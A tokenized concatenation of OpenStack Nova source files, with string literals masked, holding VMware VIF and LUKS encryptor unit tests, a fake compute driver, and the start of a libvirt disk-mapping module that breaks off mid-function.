'<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } <EOL> self . assertEqual ( expected_ref , network_ref ) <EOL> mock_check . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' ) <EOL> def test_get_neutron_network_ovs ( self , mock_check ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_OVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> expected_ref = { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . assertEqual ( expected_ref , network_ref ) <EOL> mock_check . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' ) <EOL> def test_get_neutron_network_ovs_logical_switch_id ( self , mock_check ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_OVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network , <EOL> details = { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> expected_ref = { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . assertEqual ( expected_ref , network_ref ) <EOL> mock_check . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( network_util , '<STR_LIT>' ) <EOL> def test_get_neutron_network_dvs ( self , mock_network_name ) : <EOL> fake_network_obj = { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_network_name . return_value = fake_network_obj <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_DVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> mock_network_name . assert_called_once_with ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( fake_network_obj , network_ref ) <EOL> @ mock . patch . object ( network_util , '<STR_LIT>' , <EOL> return_value = None ) <EOL> def test_get_neutron_network_dvs_no_match ( self , mock_network_name ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_DVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> self . assertRaises ( exception . NetworkNotFoundForBridge , <EOL> vif . _get_neutron_network , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> def test_get_neutron_network_invalid_type ( self ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> self . assertRaises ( exception . InvalidInput , <EOL> vif . _get_neutron_network , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> @ mock . patch . object ( vif . LOG , '<STR_LIT>' ) <EOL> @ mock . patch . object ( vim_util , '<STR_LIT>' , <EOL> return_value = '<STR_LIT>' ) <EOL> def test_check_invalid_ovs_version ( self , mock_version , mock_warning ) : <EOL> vif . _check_ovs_supported_version ( '<STR_LIT>' ) <EOL> expected_arg = { '<STR_LIT:version>' : constants . MIN_VC_OVS_VERSION } <EOL> version_arg_found = False <EOL> for call in mock_warning . call_args_list : <EOL> if call [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] == expected_arg : <EOL> version_arg_found = True <EOL> break <EOL> self . assertTrue ( version_arg_found ) </s>
<s> import mock <EOL> from oslo_concurrency import processutils <EOL> from nova . tests . unit . volume . encryptors import test_cryptsetup <EOL> from nova . volume . encryptors import luks <EOL> class LuksEncryptorTestCase ( test_cryptsetup . CryptsetupEncryptorTestCase ) : <EOL> def _create ( self , connection_info ) : <EOL> return luks . LuksEncryptor ( connection_info ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_luks ( self , mock_execute ) : <EOL> luks . is_luks ( self . dev_path ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] , any_order = False ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_luks_with_error ( self , mock_execute , mock_log ) : <EOL> error_msg = "<STR_LIT>" % self . dev_path <EOL> mock_execute . side_effect = processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> , <EOL> stderr = error_msg ) <EOL> luks . is_luks ( self . dev_path ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_log . warning . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__format_volume ( self , mock_execute ) : <EOL> self . encryptor . _format_volume ( "<STR_LIT>" ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . dev_path , <EOL> process_input = '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = True , attempts = <NUM_LIT:3> ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__open_volume ( self , mock_execute ) : <EOL> self . encryptor . _open_volume ( "<STR_LIT>" ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_attach_volume ( self , mock_execute ) : <EOL> self . encryptor . _get_key = mock . MagicMock ( ) <EOL> self . encryptor . _get_key . return_value = test_cryptsetup . fake__get_key ( None ) <EOL> self . encryptor . attach_volume ( None ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % self . dev_name , self . symlink_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_attach_volume_not_formatted ( self , mock_execute ) : <EOL> self . encryptor . _get_key = mock . MagicMock ( ) <EOL> self . encryptor . _get_key . return_value = test_cryptsetup . fake__get_key ( None ) <EOL> mock_execute . side_effect = [ <EOL> processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> ) , <EOL> processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> ) , <EOL> mock . DEFAULT , <EOL> mock . DEFAULT , <EOL> mock . DEFAULT , <EOL> ] <EOL> self . encryptor . attach_volume ( None ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . dev_path , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True , attempts = <NUM_LIT:3> ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % self . dev_name , self . symlink_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] , any_order = False ) <EOL> self . assertEqual ( <NUM_LIT:5> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_attach_volume_fail ( self , mock_execute ) : <EOL> self . encryptor . _get_key = mock . MagicMock ( ) <EOL> self . encryptor . _get_key . return_value = test_cryptsetup . fake__get_key ( None ) <EOL> mock_execute . side_effect = [ <EOL> processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> ) , <EOL> mock . DEFAULT , <EOL> ] <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> self . encryptor . attach_volume , None ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] , any_order = False ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__close_volume ( self , mock_execute ) : <EOL> self . encryptor . detach_volume ( ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , self . dev_name , <EOL> attempts = <NUM_LIT:3> , run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_detach_volume ( self , mock_execute ) : <EOL> self . encryptor . detach_volume ( ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , self . dev_name , <EOL> attempts = <NUM_LIT:3> , run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import contextlib <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_serialization import jsonutils <EOL> from oslo_utils import versionutils <EOL> from nova . compute import arch <EOL> from nova . compute import hv_type <EOL> from nova . compute import power_state <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_mode <EOL> from nova . console import type as ctype <EOL> from nova import exception <EOL> from nova . i18n import _LW <EOL> from nova . virt import diagnostics <EOL> from nova . virt import driver <EOL> from nova . virt import hardware <EOL> from nova . virt import virtapi <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _FAKE_NODES = None <EOL> def set_nodes ( nodes ) : <EOL> """<STR_LIT>""" <EOL> global _FAKE_NODES <EOL> _FAKE_NODES = nodes <EOL> def restore_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> global _FAKE_NODES <EOL> _FAKE_NODES = [ CONF . host ] <EOL> class FakeInstance ( object ) : <EOL> def __init__ ( self , name , state , uuid ) : <EOL> self . name = name <EOL> self . state = state <EOL> self . uuid = uuid <EOL> def __getitem__ ( self , key ) : <EOL> return getattr ( self , key ) <EOL> class Resources ( object ) : <EOL> vcpus = <NUM_LIT:0> <EOL> memory_mb = <NUM_LIT:0> <EOL> local_gb = <NUM_LIT:0> <EOL> vcpus_used = <NUM_LIT:0> <EOL> memory_mb_used = <NUM_LIT:0> <EOL> local_gb_used = <NUM_LIT:0> <EOL> def __init__ ( self , vcpus = <NUM_LIT:8> , memory_mb = <NUM_LIT> , local_gb = <NUM_LIT> ) : <EOL> self . vcpus = vcpus <EOL> self . memory_mb = memory_mb <EOL> self . local_gb = local_gb <EOL> def claim ( self , vcpus = <NUM_LIT:0> , mem = <NUM_LIT:0> , disk = <NUM_LIT:0> ) : <EOL> self . vcpus_used += vcpus <EOL> self . memory_mb_used += mem <EOL> self . local_gb_used += disk <EOL> def release ( self , vcpus = <NUM_LIT:0> , mem = <NUM_LIT:0> , disk = <NUM_LIT:0> ) : <EOL> self . vcpus_used -= vcpus <EOL> self . memory_mb_used -= mem <EOL> self . local_gb_used -= disk <EOL> def dump ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . vcpus , <EOL> '<STR_LIT>' : self . memory_mb , <EOL> '<STR_LIT>' : self . local_gb , <EOL> '<STR_LIT>' : self . vcpus_used , <EOL> '<STR_LIT>' : self . memory_mb_used , <EOL> '<STR_LIT>' : self . local_gb_used <EOL> } <EOL> class FakeDriver ( driver . ComputeDriver ) : <EOL> capabilities = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : True <EOL> } <EOL> vcpus = <NUM_LIT:1000> <EOL> memory_mb = <NUM_LIT> <EOL> local_gb = <NUM_LIT> <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , virtapi , read_only = False ) : <EOL> super ( FakeDriver , self ) . __init__ ( virtapi ) <EOL> self . instances = { } <EOL> self . resources = Resources ( <EOL> vcpus = self . vcpus , <EOL> memory_mb = self . memory_mb , <EOL> local_gb = self . local_gb ) <EOL> self . host_status_base = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : versionutils . convert_version_to_int ( '<STR_LIT:1.0>' ) , <EOL> '<STR_LIT>' : CONF . host , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : [ ( arch . X86_64 , hv_type . FAKE , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> self . _mounts = { } <EOL> self . _interfaces = { } <EOL> if not _FAKE_NODES : <EOL> set_nodes ( [ CONF . host ] ) <EOL> def init_host ( self , host ) : <EOL> return <EOL> def list_instances ( self ) : <EOL> return [ self . instances [ uuid ] . name for uuid in self . instances . keys ( ) ] <EOL> def list_instance_uuids ( self ) : <EOL> return self . instances . keys ( ) <EOL> def plug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def unplug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def spawn ( self , context , instance , image_meta , injected_files , <EOL> admin_password , network_info = None , block_device_info = None ) : <EOL> uuid = instance . uuid <EOL> state = power_state . RUNNING <EOL> flavor = instance . flavor <EOL> self . resources . claim ( <EOL> vcpus = flavor . vcpus , <EOL> mem = flavor . memory_mb , <EOL> disk = flavor . root_gb ) <EOL> fake_instance = FakeInstance ( instance . name , state , uuid ) <EOL> self . instances [ uuid ] = fake_instance <EOL> def snapshot ( self , context , instance , image_id , update_task_state ) : <EOL> if instance . uuid not in self . instances : <EOL> raise exception . InstanceNotRunning ( instance_id = instance . uuid ) <EOL> update_task_state ( task_state = task_states . IMAGE_UPLOADING ) <EOL> def reboot ( self , context , instance , network_info , reboot_type , <EOL> block_device_info = None , bad_volumes_callback = None ) : <EOL> pass <EOL> def get_host_ip_addr ( self ) : <EOL> return '<STR_LIT>' <EOL> def set_admin_password ( self , instance , new_pass ) : <EOL> pass <EOL> def inject_file ( self , instance , b64_path , b64_contents ) : <EOL> pass <EOL> def resume_state_on_host_boot ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> pass <EOL> def rescue ( self , context , instance , network_info , image_meta , <EOL> rescue_password ) : <EOL> pass <EOL> def unrescue ( self , instance , network_info ) : <EOL> pass <EOL> def poll_rebooting_instances ( self , timeout , instances ) : <EOL> pass <EOL> def migrate_disk_and_power_off ( self , context , instance , dest , <EOL> flavor , network_info , <EOL> block_device_info = None , <EOL> timeout = <NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> pass <EOL> def finish_revert_migration ( self , context , instance , network_info , <EOL> block_device_info = None , power_on = True ) : <EOL> pass <EOL> def post_live_migration_at_destination ( self , context , instance , <EOL> network_info , <EOL> block_migration = False , <EOL> block_device_info = None ) : <EOL> pass <EOL> def power_off ( self , instance , timeout = <NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> pass <EOL> def power_on ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> pass <EOL> def trigger_crash_dump ( self , instance ) : <EOL> pass <EOL> def soft_delete ( self , instance ) : <EOL> pass <EOL> def restore ( self , instance ) : <EOL> pass <EOL> def pause ( self , instance ) : <EOL> pass <EOL> def unpause ( self , instance ) : <EOL> pass <EOL> def suspend ( self , context , instance ) : <EOL> pass <EOL> def resume ( self , context , instance , network_info , block_device_info = None ) : <EOL> pass <EOL> def destroy ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None ) : <EOL> key = instance . uuid <EOL> if key in self . instances : <EOL> flavor = instance . flavor <EOL> self . resources . release ( <EOL> vcpus = flavor . vcpus , <EOL> mem = flavor . memory_mb , <EOL> disk = flavor . root_gb ) <EOL> del self . instances [ key ] <EOL> else : <EOL> LOG . warning ( _LW ( "<STR_LIT>" ) , <EOL> { '<STR_LIT:key>' : key , <EOL> '<STR_LIT>' : self . instances } , instance = instance ) <EOL> def cleanup ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None , destroy_vifs = True ) : <EOL> pass <EOL> def attach_volume ( self , context , connection_info , instance , mountpoint , <EOL> disk_bus = None , device_type = None , encryption = None ) : <EOL> """<STR_LIT>""" <EOL> instance_name = instance . name <EOL> if instance_name not in self . _mounts : <EOL> self . _mounts [ instance_name ] = { } <EOL> self . _mounts [ instance_name ] [ mountpoint ] = connection_info <EOL> def detach_volume ( self , connection_info , instance , mountpoint , <EOL> encryption = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> del self . _mounts [ instance . name ] [ mountpoint ] <EOL> except KeyError : <EOL> pass <EOL> def swap_volume ( self , old_connection_info , new_connection_info , <EOL> instance , mountpoint , resize_to ) : <EOL> """<STR_LIT>""" <EOL> instance_name = instance . name <EOL> if instance_name not in self . _mounts : <EOL> self . _mounts [ instance_name ] = { } <EOL> self . _mounts [ instance_name ] [ mountpoint ] = new_connection_info <EOL> def attach_interface ( self , instance , image_meta , vif ) : <EOL> if vif [ '<STR_LIT:id>' ] in self . _interfaces : <EOL> raise exception . InterfaceAttachFailed ( <EOL> instance_uuid = instance . uuid ) <EOL> self . _interfaces [ vif [ '<STR_LIT:id>' ] ] = vif <EOL> def detach_interface ( self , instance , vif ) : <EOL> try : <EOL> del self . _interfaces [ vif [ '<STR_LIT:id>' ] ] <EOL> except KeyError : <EOL> raise exception . InterfaceDetachFailed ( <EOL> instance_uuid = instance . uuid ) <EOL> def get_info ( self , instance ) : <EOL> if instance . uuid not in self . instances : <EOL> raise exception . InstanceNotFound ( instance_id = instance . uuid ) <EOL> i = self . instances [ instance . uuid ] <EOL> return hardware . InstanceInfo ( state = i . state , <EOL> max_mem_kb = <NUM_LIT:0> , <EOL> mem_kb = <NUM_LIT:0> , <EOL> num_cpu = <NUM_LIT:2> , <EOL> cpu_time_ns = <NUM_LIT:0> ) <EOL> def get_diagnostics ( self , instance ) : <EOL> return { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> def get_instance_diagnostics ( self , instance ) : <EOL> diags = diagnostics . Diagnostics ( state = '<STR_LIT>' , driver = '<STR_LIT>' , <EOL> hypervisor_os = '<STR_LIT>' , uptime = <NUM_LIT> , config_drive = True ) <EOL> diags . add_cpu ( time = <NUM_LIT> ) <EOL> diags . add_nic ( mac_address = '<STR_LIT>' , <EOL> rx_packets = <NUM_LIT> , <EOL> rx_octets = <NUM_LIT> , <EOL> tx_octets = <NUM_LIT> , <EOL> tx_packets = <NUM_LIT> ) <EOL> diags . add_disk ( id = '<STR_LIT>' , <EOL> read_bytes = <NUM_LIT> , <EOL> read_requests = <NUM_LIT> , <EOL> write_bytes = <NUM_LIT> , <EOL> write_requests = <NUM_LIT> ) <EOL> diags . memory_details . maximum = <NUM_LIT> <EOL> return diags <EOL> def get_all_bw_counters ( self , instances ) : <EOL> """<STR_LIT>""" <EOL> bw = [ ] <EOL> return bw <EOL> def get_all_volume_usage ( self , context , compute_host_bdms ) : <EOL> """<STR_LIT>""" <EOL> volusage = [ ] <EOL> return volusage <EOL> def get_host_cpu_stats ( self ) : <EOL> stats = { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:user>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } <EOL> stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> return stats <EOL> def block_stats ( self , instance , disk_id ) : <EOL> return [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , None ] <EOL> def get_console_output ( self , context , instance ) : <EOL> return '<STR_LIT>' <EOL> def get_vnc_console ( self , context , instance ) : <EOL> return ctype . ConsoleVNC ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_spice_console ( self , context , instance ) : <EOL> return ctype . ConsoleSpice ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> , <EOL> tlsPort = <NUM_LIT> ) <EOL> def get_rdp_console ( self , context , instance ) : <EOL> return ctype . ConsoleRDP ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_serial_console ( self , context , instance ) : <EOL> return ctype . ConsoleSerial ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_mks_console ( self , context , instance ) : <EOL> return ctype . ConsoleMKS ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_console_pool_info ( self , console_type ) : <EOL> return { '<STR_LIT:address>' : '<STR_LIT:127.0.0.1>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' } <EOL> def refresh_security_group_rules ( self , security_group_id ) : <EOL> return True <EOL> def refresh_instance_security_rules ( self , instance ) : <EOL> return True <EOL> def get_available_resource ( self , nodename ) : <EOL> """<STR_LIT>""" <EOL> cpu_info = collections . OrderedDict ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> } ) , <EOL> ] ) <EOL> if nodename not in _FAKE_NODES : <EOL> return { } <EOL> host_status = self . host_status_base . copy ( ) <EOL> host_status . update ( self . resources . dump ( ) ) <EOL> host_status [ '<STR_LIT>' ] = nodename <EOL> host_status [ '<STR_LIT>' ] = nodename <EOL> host_status [ '<STR_LIT>' ] = nodename <EOL> host_status [ '<STR_LIT>' ] = jsonutils . dumps ( cpu_info ) <EOL> return host_status <EOL> def ensure_filtering_rules_for_instance ( self , instance , network_info ) : <EOL> return <EOL> def get_instance_disk_info ( self , instance , block_device_info = None ) : <EOL> return <EOL> def live_migration ( self , context , instance , dest , <EOL> post_method , recover_method , block_migration = False , <EOL> migrate_data = None ) : <EOL> post_method ( context , instance , dest , block_migration , <EOL> migrate_data ) <EOL> return <EOL> def live_migration_force_complete ( self , instance ) : <EOL> return <EOL> def live_migration_abort ( self , instance ) : <EOL> return <EOL> def check_can_live_migrate_destination_cleanup ( self , context , <EOL> dest_check_data ) : <EOL> return <EOL> def check_can_live_migrate_destination ( self , context , instance , <EOL> src_compute_info , dst_compute_info , <EOL> block_migration = False , <EOL> disk_over_commit = False ) : <EOL> return { } <EOL> def check_can_live_migrate_source ( self , context , instance , <EOL> dest_check_data , block_device_info = None ) : <EOL> return <EOL> def finish_migration ( self , context , migration , instance , disk_info , <EOL> network_info , image_meta , resize_instance , <EOL> block_device_info = None , power_on = True ) : <EOL> return <EOL> def confirm_migration ( self , migration , instance , network_info ) : <EOL> return <EOL> def pre_live_migration ( self , context , instance , block_device_info , <EOL> network_info , disk_info , migrate_data = None ) : <EOL> return <EOL> def unfilter_instance ( self , instance , network_info ) : <EOL> return <EOL> def _test_remove_vm ( self , instance_uuid ) : <EOL> """<STR_LIT>""" <EOL> self . instances . pop ( instance_uuid ) <EOL> def host_power_action ( self , action ) : <EOL> """<STR_LIT>""" <EOL> return action <EOL> def host_maintenance_mode ( self , host , mode ) : <EOL> """<STR_LIT>""" <EOL> if not mode : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def set_host_enabled ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> if enabled : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_volume_connector ( self , instance ) : <EOL> return { '<STR_LIT>' : CONF . my_block_storage_ip , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' } <EOL> def get_available_nodes ( self , refresh = False ) : <EOL> return _FAKE_NODES <EOL> def instance_on_disk ( self , instance ) : <EOL> return False <EOL> def quiesce ( self , context , instance , image_meta ) : <EOL> pass <EOL> def unquiesce ( self , context , instance , image_meta ) : <EOL> pass <EOL> class FakeVirtAPI ( virtapi . VirtAPI ) : <EOL> @ contextlib . contextmanager <EOL> def wait_for_instance_event ( self , instance , event_names , deadline = <NUM_LIT> , <EOL> error_callback = None ) : <EOL> yield <EOL> class SmallFakeDriver ( FakeDriver ) : <EOL> vcpus = <NUM_LIT:1> <EOL> memory_mb = <NUM_LIT> <EOL> local_gb = <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import operator <EOL> from oslo_config import cfg <EOL> import six <EOL> from nova import block_device <EOL> from nova . compute import arch <EOL> from nova . compute import vm_mode <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova . objects import base as obj_base <EOL> from nova . virt import configdrive <EOL> from nova . virt import driver <EOL> from nova . virt . libvirt import utils as libvirt_utils <EOL> from nova . virt import osinfo <EOL> CONF = cfg . CONF <EOL> SUPPORTED_DEVICE_TYPES = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> BOOT_DEV_FOR_TYPE = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def has_disk_dev ( mapping , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> for disk in mapping : <EOL> info = mapping [ disk ] <EOL> if info [ '<STR_LIT>' ] == disk_dev : <EOL> return True <EOL> return False <EOL> def get_dev_prefix_for_disk_bus ( disk_bus ) : <EOL> """<STR_LIT>""" <EOL> if CONF . libvirt . disk_prefix : <EOL> return CONF . libvirt . disk_prefix <EOL> if disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == 